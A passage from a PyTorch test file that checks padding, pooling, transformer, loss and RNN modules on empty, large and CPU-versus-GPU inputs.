(torch.nn.ReplicationPad3d(3), torch.randn(0, 3, 10, 10, 10, device=device, dtype=dtype))]:
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, 'Expected 2D or 3D'):
mod = torch.nn.ReplicationPad1d(2)
inp = torch.randn(3, 0, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, 'Expected 3D or 4D'):
mod = torch.nn.ReplicationPad2d((2, 2, 2, 2))
inp = torch.randn(43, 0, 10, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, 'Expected 4D or 5D'):
mod = torch.nn.ReplicationPad3d((2, 2, 2, 2, 2, 2))
inp = torch.randn(3, 0, 10, 10, 10, device=device, dtype=dtype)
mod(inp)
def test_ReplicationPad1d_large(self, device):
shapes = ([2, 65736, 4], [65736, 2, 4])
pl, pr = 3, 4
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
model = torch.nn.ReplicationPad1d((pl, pr))
# forward
out = model(x)
self.assertEqual(out[:, :, pl : -pr], x)
left_padding = out[:, :, : pl]
self.assertEqual(left_padding, x[:, :, :1].expand_as(left_padding))
right_padding = out[:, :, -pr :]
self.assertEqual(right_padding, x[:, :, -1:].expand_as(right_padding))
# backward
g = torch.randn_like(out)
out.backward(g)
self.assertEqual(x.grad[:, :, 1 : -1], g[:, :, pl + 1 : -pr - 1])
self.assertEqual(x.grad[:, :, 0], g[:, :, : pl + 1].sum(-1))
self.assertEqual(x.grad[:, :, -1], g[:, :, -pr - 1:].sum(-1))
def test_ReplicationPad2d_large(self, device):
shapes = ([2, 65736, 4, 4], [65736, 2, 4, 4])
pl, pr, pt, pb = 3, 4, 5, 6
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
model = torch.nn.ReplicationPad2d((pl, pr, pt, pb))
# forward center, edge
out = model(x)
self.assertEqual(out[:, :, pt : -pb, pl : -pr], x)
left_padding = out[:, :, pt : -pb, : pl]
self.assertEqual(left_padding, x[:, :, :, :1].expand_as(left_padding))
right_padding = out[:, :, pt : -pb, -pr :]
self.assertEqual(right_padding, x[:, :, :, -1:].expand_as(right_padding))
top_padding = out[:, :, : pt, pl : -pr]
self.assertEqual(top_padding, x[:, :, :1, :].expand_as(top_padding))
bottom_padding = out[:, :, -pb : , pl : -pr]
self.assertEqual(bottom_padding, x[:, :, -1:, :].expand_as(bottom_padding))
# forward corner
tl_padding = out[:, :, : pt + 1, : pl + 1]
self.assertEqual(tl_padding, x[:, :, :1, :1].expand_as(tl_padding))
tr_padding = out[:, :, : pt + 1, -pr - 1:]
self.assertEqual(tr_padding, x[:, :, :1, -1:].expand_as(tr_padding))
bl_padding = out[:, :, -pb - 1:, : pl + 1]
self.assertEqual(bl_padding, x[:, :, -1:, :1].expand_as(bl_padding))
br_padding = out[:, :, -pb - 1:, -pr - 1:]
self.assertEqual(br_padding, x[:, :, -1:, -1:].expand_as(br_padding))
# backward center, edge
g = torch.randn_like(out)
out.backward(g)
self.assertEqual(x.grad[:, :, 1:-1, 1:-1], g[:, :, pt + 1 : -pb - 1, pl + 1 : -pr - 1])
self.assertEqual(x.grad[:, :, 1:-1, 0], g[:, :, pt + 1 : -pb - 1, : pl + 1].sum(-1))
self.assertEqual(x.grad[:, :, 1:-1, -1], g[:, :, pt + 1 : -pb - 1, -pr - 1 :].sum(-1))
self.assertEqual(x.grad[:, :, 0, 1:-1], g[:, :, : pt + 1, pl + 1 : -pr - 1].sum(-2))
self.assertEqual(x.grad[:, :, -1, 1:-1], g[:, :, -pb - 1 :, pl + 1 : -pr - 1].sum(-2))
# backward corner
self.assertEqual(x.grad[:, :, 0, 0], g[:, :, : pt + 1, : pl + 1].sum((-2, -1)))
self.assertEqual(x.grad[:, :, 0, -1], g[:, :, : pt + 1, -pr - 1 :].sum((-2, -1)))
self.assertEqual(x.grad[:, :, -1, 0], g[:, :, -pb - 1 :, : pl + 1].sum((-2, -1)))
self.assertEqual(x.grad[:, :, -1, -1], g[:, :, -pb - 1 :, -pr - 1 :].sum((-2, -1)))
@largeTensorTest("6GB")
def test_ReplicationPad3d_large(self, device):
shapes = ([1, 65736, 2, 2, 2], [65736, 1, 2, 2, 2])
pl, pr, pt, pbt, pf, pbk = 3, 4, 5, 6, 7, 8
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
model = torch.nn.ReplicationPad3d((pl, pr, pt, pbt, pf, pbk))
# forward center
out = model(x)
self.assertEqual(out[:, :, pf : -pbk, pt : -pbt, pl : -pr], x)
# backward center
g = torch.randn_like(out)
out.backward(g)
self.assertEqual(x.grad[:, :, 1:-1, 1:-1, 1:-1], g[:, :, pf + 1 : -pbk - 1, pt + 1 : -pbt - 1, pl + 1 : -pr - 1])
@onlyOnCPUAndCUDA
def test_Bilinear_empty(self, device):
mod = torch.nn.Bilinear(20, 30, 40).to(device)
inp1 = torch.randn(0, 10, 20, requires_grad=True, device=device)
inp2 = torch.randn(0, 10, 30, requires_grad=True, device=device)
output = mod(inp1, inp2)
output.sum().backward()
self.assertEqual(inp1, torch.zeros_like(inp1))
self.assertEqual(inp2, torch.zeros_like(inp2))
self.assertEqual(inp1.grad, torch.zeros_like(inp1))
self.assertEqual(inp2.grad, torch.zeros_like(inp2))
@onlyOnCPUAndCUDA
def test_TransformerEncoderLayer_empty(self, device):
for batch_first, input_shape in [(True, (0, 10, 512)),
(False, (10, 0, 512))]:
input = torch.rand(*input_shape, device=device)
encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
self._test_module_empty_input(encoder_layer, input, check_size=False)
@onlyOnCPUAndCUDA
def test_TransformerEncoder_empty(self, device):
for batch_first, input_shape in [(True, (0, 10, 512)),
(False, (10, 0, 512))]:
input = torch.rand(*input_shape, device=device)
encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6).to(device)
self._test_module_empty_input(transformer_encoder, input, check_size=False)
@onlyOnCPUAndCUDA
def test_TransformerDecoderLayer_empty(self, device):
for batch_first, memory_shape, tgt_shape in [(True, (0, 10, 512), (0, 20, 512)),
(False, (10, 0, 512), (20, 0, 512))]:
memory = torch.rand(*memory_shape, device=device)
tgt = torch.rand(*tgt_shape, requires_grad=True, device=device)
decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
self._test_module_empty_inputs(decoder_layer, [tgt, memory])
@onlyOnCPUAndCUDA
def test_TransformerDecoder_empty(self, device):
for batch_first, memory_shape, tgt_shape in [(True, (0, 10, 512), (0, 20, 512)),
(False, (10, 0, 512), (20, 0, 512))]:
memory = torch.rand(*memory_shape, device=device)
tgt = torch.rand(*tgt_shape, requires_grad=True, device=device)
decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=6).to(device)
self._test_module_empty_inputs(transformer_decoder, [tgt, memory])
@onlyOnCPUAndCUDA
def test_Transformer_empty(self, device):
for batch_first, src_shape, tgt_shape in [(True, (10, 0, 512), (20, 0, 512))]:
transformer_model = nn.Transformer(nhead=16, num_encoder_layers=12).to(device)
src = torch.rand(*src_shape, requires_grad=True, device=device)
tgt = torch.rand(*tgt_shape, requires_grad=True, device=device)
self._test_module_empty_inputs(transformer_model, [src, tgt])
@onlyOnCPUAndCUDA
@dtypes(torch.float32, torch.complex64)
def test_ReflectionPad_empty(self, device, dtype):
for mod, inp in [
(torch.nn.ReflectionPad1d(2), torch.randn(0, 3, 10, device=device, dtype=dtype)),
(torch.nn.ReflectionPad2d(2), torch.randn(0, 3, 10, 10, device=device, dtype=dtype)),
(torch.nn.ReflectionPad3d(3), torch.randn(0, 3, 10, 10, 10, device=device, dtype=dtype))]:
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, '2D or 3D'):
mod = torch.nn.ReflectionPad1d(2)
inp = torch.randn(3, 0, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, '3D or 4D'):
mod = torch.nn.ReflectionPad2d(2)
inp = torch.randn(3, 0, 10, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, '4D or 5D'):
mod = torch.nn.ReflectionPad3d(3)
inp = torch.randn(3, 0, 10, 10, 10, device=device, dtype=dtype)
mod(inp)
@onlyCUDA # Test if CPU and GPU results match
def test_ReflectionPad2d_large(self, device):
shapes = ([2, 65736, 6, 6], [65736, 2, 6, 6])
pad = (1, 2, 3, 4)
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
ref_x = x.detach().cpu().requires_grad_()
out = F.pad(x, pad, mode='reflect')
ref_out = F.pad(ref_x, pad, mode='reflect')
self.assertEqual(out, ref_out)
g = torch.randn_like(out)
ref_g = g.cpu()
out.backward(g)
ref_out.backward(ref_g)
self.assertEqual(x.grad, ref_x.grad)
@onlyOnCPUAndCUDA
def test_LocalResponseNorm_empty(self, device):
mod = torch.nn.LocalResponseNorm(2).to(device)
inp = torch.ones(0, 5, 24, 24, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
@onlyCUDA # Test if CPU and GPU results match
def test_ReflectionPad3d_large(self, device):
shapes = ([2, 1000, 7, 7, 7], [1000, 2, 7, 7, 7])
pad = (1, 2, 3, 4, 5, 6)
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
ref_x = x.detach().cpu().requires_grad_()
out = F.pad(x, pad, mode='reflect')
ref_out = F.pad(ref_x, pad, mode='reflect')
self.assertEqual(out, ref_out)
g = torch.randn_like(out)
ref_g = g.cpu()
out.backward(g)
ref_out.backward(ref_g)
self.assertEqual(x.grad, ref_x.grad)
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
def test_MarginLoss_empty(self, device, dtype):
for mod, x, y in [
(torch.nn.MultiMarginLoss().to(device),
torch.randn(0, 10, requires_grad=True, device=device, dtype=dtype),
torch.ones(0, device=device).type(torch.long)),
(torch.nn.MultiLabelMarginLoss().to(device),
torch.randn(0, 10, requires_grad=True, device=device, dtype=dtype),
torch.ones(0, 10, device=device).type(torch.long))]:
out = mod(x, y)
out.sum().backward()
self.assertEqual(x, torch.zeros_like(x))
self.assertEqual(x.grad, torch.zeros_like(x))
with self.assertRaisesRegex(RuntimeError, 'Expected'):
x = torch.randn(0, requires_grad=True, device=device, dtype=dtype)
y = torch.ones(10, device=device).type(torch.long)
mod(x, y)
with self.assertRaisesRegex(RuntimeError, 'Expected'):
x = torch.randn(10, 0, requires_grad=True, device=device, dtype=dtype)
y = torch.ones(10, 0, device=device).type(torch.long)
mod(x, y)
@onlyOnCPUAndCUDA
@dtypes(torch.float, torch.double)
def test_adaptive_pooling_zero_batch(self, dtype, device):
inp = torch.ones(0, 10, dtype=dtype, device=device)
mod = torch.nn.AdaptiveAvgPool1d(5).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
inp = torch.ones(0, 10, 10, dtype=dtype, device=device)
mod = torch.nn.AdaptiveAvgPool2d((5, 5)).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
inp = torch.ones(0, 10, 10, 10, dtype=dtype, device=device)
mod = torch.nn.AdaptiveAvgPool3d((5, 5, 5)).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
@onlyOnCPUAndCUDA
def test_FractionalMaxPool2d_zero_batch(self, device):
mod = nn.FractionalMaxPool2d(3, output_ratio=(0.5, 0.5))
inp = torch.ones(0, 16, 50, 32, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected input"):
inp = torch.randn(1, 0, 50, 32, device=device)
mod(inp)
@onlyOnCPUAndCUDA
def test_FractionalMaxPool3d_zero_batch(self, device):
mod = nn.FractionalMaxPool3d(3, output_ratio=(0.5, 0.5, 0.5)).to(device)
inp = torch.ones(0, 16, 50, 32, 32, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected input"):
inp = torch.randn(1, 0, 50, 32, 32, device=device)
mod(inp)
@onlyOnCPUAndCUDA
def test_Unfold_empty(self, device):
inp = torch.randn(0, 3, 3, 4, device=device)
unfold = torch.nn.Unfold(kernel_size=(2, 3)).to(device)
self._test_module_empty_input(unfold, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, 'Expected 3D or 4D'):
inp = torch.randn(3, 0, 3, 4, device=device)
unfold = torch.nn.Unfold(kernel_size=(2, 3)).to(device)
unfold(inp)
@onlyOnCPUAndCUDA
def test_MaxPool_zero_batch_dim(self, device):
inp = torch.randn(0, 16, 50, device=device)
mod = torch.nn.MaxPool1d(3, stride=2).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
# 1D is supposed to be okay with 0 numel() inputs so dont test
# error raising for that case.
inp = torch.randn(0, 16, 50, 32, device=device)
mod = torch.nn.MaxPool2d(3, stride=2).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.randn(1, 0, 50, 32, device=device)
mod(inp)
inp = torch.ones(0, 16, 50, 44, 31, device=device)
mod = torch.nn.MaxPool3d(3, stride=2).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.ones(1, 0, 50, 44, 31, device=device)
mod(inp)
@onlyOnCPUAndCUDA
def test_MaxUnpool_zero_batch_dim(self, device):
pool = torch.nn.MaxPool1d(2, stride=2, return_indices=True).to(device)
unpool = torch.nn.MaxUnpool1d(2, stride=2).to(device)
inp = torch.randn(0, 10, 10, requires_grad=True, device=device)
output, indices = pool(inp)
output.requires_grad_(True)
unpool_out = unpool(output, indices)
unpool_out.sum().backward()
self.assertEqual(inp.grad, torch.zeros_like(inp))
self.assertEqual(unpool_out, torch.zeros_like(unpool_out))
pool = torch.nn.MaxPool2d(2, stride=2, return_indices=True).to(device)
unpool = torch.nn.MaxUnpool2d(2, stride=2).to(device)
inp = torch.randn(0, 10, 10, 10, requires_grad=True, device=device)
output, indices = pool(inp)
unpool_out = unpool(output, indices)
unpool_out.sum().backward()
self.assertEqual(inp.grad, torch.zeros_like(inp))
self.assertEqual(unpool_out, torch.zeros_like(unpool_out))
pool = torch.nn.MaxPool3d(2, stride=2, return_indices=True).to(device)
unpool = torch.nn.MaxUnpool3d(2, stride=2).to(device)
inp = torch.randn(0, 10, 10, 10, 10, requires_grad=True, device=device)
output, indices = pool(inp)
output.requires_grad_(True)
unpool_out = unpool(output, indices)
unpool_out.sum().backward()
self.assertEqual(inp.grad, torch.zeros_like(inp))
self.assertEqual(unpool_out, torch.zeros_like(unpool_out))
@onlyOnCPUAndCUDA
def test_AdaptiveMaxPool_zero_batch_dim(self, device):
inp = torch.randn(0, 16, 50, device=device)
mod = torch.nn.AdaptiveMaxPool1d(3).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.randn(1, 0, 50, device=device)
mod(inp)
inp = torch.randn(0, 16, 50, 32, device=device)
mod = torch.nn.AdaptiveMaxPool2d(3).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.randn(1, 0, 50, 32, device=device)
mod(inp)
inp = torch.ones(0, 16, 50, 44, 31, device=device)
mod = torch.nn.AdaptiveMaxPool3d(3).to(device)
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, "Expected"):
inp = torch.ones(1, 0, 50, 44, 31, device=device)
mod(inp)
@onlyCUDA
@dtypes(torch.float, torch.double)
@tf32_on_and_off(0.005)
def test_rnn_fused(self, device, dtype):
def copy_rnn(rnn1, rnn2):
for x_layer, y_layer in zip(rnn1.all_weights, rnn2.all_weights):
for x, y in zip(x_layer, y_layer):
x.data.copy_(y.data)
def check_rnn_grads(rnn1, rnn2):
for x_layer, y_layer in zip(rnn1.all_weights, rnn2.all_weights):
for x, y in zip(x_layer, y_layer):
self.assertEqual(x.grad, y.grad, atol=5e-5, rtol=0)
input_size = 10
hidden_size = 6
num_layers = 2
seq_length = 7
batch = 6
input_val = torch.randn(seq_length, batch, input_size, dtype=dtype)
grad_output = torch.randn(seq_length, batch, hidden_size, dtype=dtype)
hx_val = torch.randn(num_layers, batch, hidden_size, dtype=dtype)
grad_hy = torch.randn(num_layers, batch, hidden_size, dtype=dtype)
with torch.backends.cudnn.flags(enabled=False, allow_tf32=None):
for module in (nn.GRU, nn.LSTM):
for bias in (True, False):
rnn = module(input_size, hidden_size, num_layers, bias=bias).to(dtype)
rnn_device = module(input_size, hidden_size, num_layers, bias=bias).to(device, dtype)
copy_rnn(rnn, rnn_device)
is_lstm = isinstance(rnn, nn.LSTM)
if is_lstm:
hx = (hx_val.clone().requires_grad_(True),
hx_val.clone().add(1).requires_grad_(True))
hx_device = (hx_val.clone().to(device).requires_grad_(True),
hx_val.clone().to(device).add(1).requires_grad_(True))
else:
hx = hx_val.clone().requires_grad_(True)
hx_device = hx_val.clone().to(device).requires_grad_(True)
inp = input_val.clone().requires_grad_(True)
inp_cu = input_val.clone().to(device).requires_grad_(True)
output1, hy1 = rnn(inp, hx)
output2, hy2 = rnn_device(inp_cu, hx_device)
if is_lstm:
torch.autograd.backward(
[output1, hy1[0], hy1[1]], [grad_output, grad_hy, grad_hy + 1]
)
torch.autograd.backward(
[output2, hy2[0], hy2[1]],
[grad_output.to(device), grad_hy.to(device), (grad_hy + 1).to(device)]
)
else:
torch.autograd.backward([output1, hy1], [grad_output, grad_hy])
torch.autograd.backward([output2, hy2], [grad_output.to(device), grad_hy.to(device)])
self.assertEqual(output1, output2)
self.assertEqual(hy1, hy2)
check_rnn_grads(rnn, rnn_device)
self.assertEqual(inp.grad, inp_cu.grad)
if is_lstm:
self.assertEqual(hx[0].grad, hx_device[0].grad)
self.assertEqual(hx[1].grad, hx_device[1].grad)
else:
self.assertEqual(hx.grad, hx_device.grad)
def test_BatchNorm_empty(self, device):
mod = torch.nn.BatchNorm2d(3).to(device)
inp = torch.randn(0, 3, 2, 2, device=device)
self._test_module_empty_input(mod, inp)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp)
self.assertEqual(mod.running_mean, torch.tensor([0., 0, 0], device=device))
self.assertEqual(mod.running_var, torch.tensor([1., 1, 1], device=device))
self.assertEqual(mod.weight.grad, torch.tensor([0., 0, 0], device=device))
self.assertEqual(mod.bias.grad, torch.tensor([0., 0, 0], device=device))
def test_group_conv_empty(self, device):
mod = torch.nn.Conv2d(4, 4, stride=2, kernel_size=3, padding=1, groups=4).to(device)
inp = torch.randn(0, 4, 4, 4, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp, check_size=False)
def test_group_convTranspose_empty(self, device):
mod = torch.nn.ConvTranspose2d(4, 4, stride=2, kernel_size=3, padding=1, groups=4).to(device)
inp = torch.randn(0, 4, 4, 4, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp, check_size=False)
def test_convTranspose_empty(self, device):
mod = torch.nn.ConvTranspose2d(4, 4, stride=2, kernel_size=3, padding=1).to(device)
inp = torch.randn(0, 4, 4, 4, device=device)
self._test_module_empty_input(mod, inp, check_size=False)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp, check_size=False)
@onlyOnCPUAndCUDA
def test_AvgPool2d_empty(self, device):
avgpool = torch.nn.AvgPool2d(3, stride=2).to(device)
inp = torch.randn(0, 16, 20, 32, device=device)
self._test_module_empty_input(avgpool, inp, check_size=False)
clast_inp = torch.randn(0, 16, 20, 32, device=device).contiguous(memory_format=torch.channels_last)
self._test_module_empty_input(avgpool, clast_inp, check_size=False)
# test with empty non-batch input
with self.assertRaisesRegex(RuntimeError, '3D or 4D'):
inp = torch.randn(16, 0, 20, 32, device=device)
avgpool(inp)
@onlyCUDA
@largeTensorTest('16GB')
def test_prelu_backward_32bit_indexing(self, device):
m = torch.nn.PReLU().cuda().half()
input_ = torch.ones((1024, 1024, 1024, 2), dtype=torch.half, device=device)
output = m(input_)
output.backward(input_)
def test_linear_empty(self, device):
mod = torch.nn.Linear(7, 7).to(device)
inp = torch.randn(0, 7, device=device)
self._test_module_empty_input(mod, inp)
def test_one_hot(self, device):
if self.device_type != 'cuda': # cuda throws device assert for invalid data
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.tensor([3, 4, -1, 0], device=device), -1)
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), 3)
t = torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device))
expected = torch.tensor([[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), -1)
expected = torch.tensor([[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1],
[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), 6)
expected = torch.tensor([[0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor([[3, 4], [1, 0]], device=device))
expected = torch.tensor([[[0, 0, 0, 1, 0],
[0, 0, 0, 0, 1]],
[[0, 1, 0, 0, 0],
[1, 0, 0, 0, 0]]], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.tensor(4, device=device))
expected = torch.tensor([0, 0, 0, 0, 1], device=device)
self.assertEqual(t, expected)
t = torch.nn.functional.one_hot(torch.empty([4, 0], dtype=torch.long, device=device), 100)
expected = torch.empty([4, 0, 100], dtype=torch.long)
self.assertEqual(t, expected)
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.empty([4, 0], dtype=torch.long, device=device))
with self.assertRaises(RuntimeError):
torch.nn.functional.one_hot(torch.tensor([3, 4, 1, 0], device=device), -2)
def test_nn_scalars(self, device):
# One off tests to ensure scalars from nn.yaml are properly applied
def verify_scalars(input, output):
if input.dim() == 0:
self.assertEqual((), output.shape)
else:
self.assertNotEqual((), output.shape)
output.sum().backward()
self.assertEqual(input.shape, input.grad.shape)
for input_shape in [(5, 6), ()]:
for module in [torch.nn.ELU, torch.nn.Hardtanh, torch.nn.LeakyReLU, torch.nn.LogSigmoid,
torch.nn.RReLU, torch.nn.Softshrink, torch.nn.Softplus, torch.nn.Sigmoid,
torch.nn.Tanh]:
input = torch.randn(input_shape, device=device, requires_grad=True)
m = module()
output = m(input)
verify_scalars(input, output)
def test_nn_scalars_reductions(self, device):
# One off tests to ensure scalars from nn.yaml are properly applied
def verify_reduction_scalars(input, reduction, output):
if reduction != 'none' or input.dim() == 0:
self.assertEqual((), output.shape)
else:
self.assertNotEqual((), output.shape)
output.sum().backward()
self.assertEqual(input.shape, input.grad.shape)
for input_shape in [(5, 6), ()]:
for reduction in ['none', 'mean', 'sum']:
for module in [torch.nn.BCELoss, torch.nn.L1Loss, torch.nn.MSELoss,
torch.nn.SmoothL1Loss, torch.nn.SoftMarginLoss]:
input = torch.randn(input_shape, device=device, requires_grad=True)
target = torch.empty(input_shape, device=device).random_(2)
sigmoid = nn.Sigmoid()
input = torch.randn(input_shape, device=device, requires_grad=True)
m = module(reduction=reduction)
output = m(sigmoid(input), target)
verify_reduction_scalars(input, reduction, output)
# verify that bogus reduction strings are errors
@onlyOnCPUAndCUDA
def test_invalid_reduction_strings(self, device):
input = torch.randn(3, 5, requires_grad=True, device=device)
cinput = torch.randn(3, 5, requires_grad=True, device=device, dtype=torch.cfloat)
target = torch.tensor([1, 0, 4], device=device)
var = torch.ones(size=input.size(), requires_grad=True, device=device)
for reduction in ['none', 'invalid']:
def v(fn):
if reduction == 'invalid':
self.assertRaises(ValueError, lambda: fn())
else:
fn()
v(lambda: F.nll_loss(input, target, reduction=reduction))
v(lambda: F.cross_entropy(input, target, reduction=reduction))
v(lambda: F.multi_margin_loss(input, target, reduction=reduction))
v(lambda: F.kl_div(input, input, reduction=reduction))
v(lambda: F.huber_loss(input, input, reduction=reduction))
v(lambda: F.smooth_l1_loss(input, input, reduction=reduction))
v(lambda: F.l1_loss(input, input, reduction=reduction))
v(lambda: F.l1_loss(cinput, cinput, reduction=reduction))
v(lambda: F.mse_loss(input, input, reduction=reduction))
v(lambda: F.hinge_embedding_loss(input, input, reduction=reduction))
v(lambda: F.poisson_nll_loss(input, input, reduction=reduction))
v(lambda: F.gaussian_nll_loss(input, input, var, reduction=reduction))
v(lambda: F.binary_cross_entropy(torch.sigmoid(input), input, reduction=reduction))
v(lambda: F.binary_cross_entropy_with_logits(input, input, reduction=reduction))
zeros = torch.zeros_like(input).to(torch.int64)
v(lambda: F.multilabel_soft_margin_loss(input, zeros, reduction=reduction))
v(lambda: F.multilabel_margin_loss(input, zeros, reduction=reduction))
v(lambda: F.triplet_margin_loss(input, input, input, reduction=reduction))
v(lambda: F.triplet_margin_with_distance_loss(input, input, input, reduction=reduction))
v(lambda: F.margin_ranking_loss(input, input, input.sign(), reduction=reduction))
v(lambda: F.cosine_embedding_loss(input, input, input[:, 0].sign(), reduction=reduction))
log_probs = torch.randn(50, 16, 20, requires_grad=True, device=device).log_softmax(2)
targets = torch.randint(1, 20, (16, 30), dtype=torch.long, device=device)
input_lengths = torch.full((16,), 50, dtype=torch.long, device=device)
target_lengths = torch.randint(10, 30, (16,), dtype=torch.long, device=device)
v(lambda: F.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction=reduction))
# FIXME: should we allow derivatives on these?
v(lambda: F.soft_margin_loss(input, input.sign().detach(), reduction=reduction))
@onlyOnCPUAndCUDA
def test_smooth_l1_loss_vs_huber_loss(self, device):
def _make_test_tensor(shape, contiguous=True):
if contiguous:
test_tensor = torch.randn(shape, device=device)
else:
# Select every other element in the innermost dimension to
# make it non-contiguous.
doubled_shape = list(shape)
doubled_shape[-1] *= 2
test_tensor = torch.randn(doubled_shape, device=device)
test_tensor = test_tensor[..., ::2]
return test_tensor
def _test_smooth_l1_loss_vs_huber_loss_helper(input, target, beta, require_equal):
for reduction in ['mean', 'sum', 'none']:
smooth_l1 = torch.nn.SmoothL1Loss(beta=beta, reduction=reduction)
# beta hyper-parameter is called delta for Huber
huber = torch.nn.HuberLoss(delta=beta, reduction=reduction)
smooth_l1_loss = smooth_l1(input, target)
huber_loss = huber(input, target)
if require_equal:
self.assertEqual(smooth_l1_loss, huber_loss)
else:
# Huber loss should be larger than smooth L1 loss by a factor of beta.
self.assertEqual(smooth_l1_loss * beta, huber_loss)
def _test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta, require_equal):
# Test the non-vectorized case.
shape = (2, 2)
_test_smooth_l1_loss_vs_huber_loss_helper(input=_make_test_tensor(shape),
target=_make_test_tensor(shape),
beta=beta,
require_equal=require_equal)
# Test the vectorized case (innermost dim > 32).
shape = (64, 64)
_test_smooth_l1_loss_vs_huber_loss_helper(input=_make_test_tensor(shape),
target=_make_test_tensor(shape),
beta=beta,
require_equal=require_equal)
# Test the non-contiguous case.
_test_smooth_l1_loss_vs_huber_loss_helper(input=_make_test_tensor(shape, contiguous=False),
target=_make_test_tensor(shape, contiguous=False),
beta=beta,
require_equal=require_equal)
def test_equal_when_beta_is_one():
_test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta=1.0, require_equal=True)
def test_unequal_when_beta_is_less_than_one():
_test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta=0.5, require_equal=False)
def test_unequal_when_beta_is_greater_than_one():
_test_smooth_l1_loss_vs_huber_loss_multi_input_helper(beta=1.5, require_equal=False)
test_equal_when_beta_is_one()
test_unequal_when_beta_is_less_than_one()
test_unequal_when_beta_is_greater_than_one()
# We don't want to make propagating NaN a hard requirement on ops, but for
# these easy ones, we should make them do so.
def test_nonlinearity_propagate_nan(self, device):
def test(nonlinearity, *args, **kwargs):
x = torch.tensor([nan], device=device)
fn = getattr(F, nonlinearity)
try:
self.assertTrue(math.isnan(fn(x, *args, **kwargs).item()))
except Exception as e:
if 'not implemented' not in str(e):
raise
test('relu')
test('relu', inplace=True)
test('relu6')
test('elu')
test('selu')
test('celu')
test('rrelu')
test('rrelu', inplace=True)
test('hardtanh')
test('tanh')
test('sigmoid')
test('logsigmoid')
test('hardshrink')
test('tanhshrink')
test('softsign')
test('softmin', 0)
test('softmax', 0)
test('log_softmax', 0)
test('leaky_relu', 0.2)
test('threshold', 3, 2)
test('threshold', 3, 2, inplace=True)
def test_pooling_shape(self, device):
''' Test the output shape calculation for pooling functions '''
# Checks output shape against expected for 1D, 2D and 3D
def check(expected_out_shape, sizes, *args, **kwargs):
for kernel in ['max', 'avg']:
for i in [1, 2, 3]:
if hasattr(torch.nn.functional, f'{kernel}_pool{i}d'):
op = getattr(torch.nn.functional, f'{kernel}_pool{i}d')
t = torch.randn(sizes[:i + 2], device=device)
self.assertEqual(op(t, *args, **kwargs).shape, expected_out_shape[:i + 2])
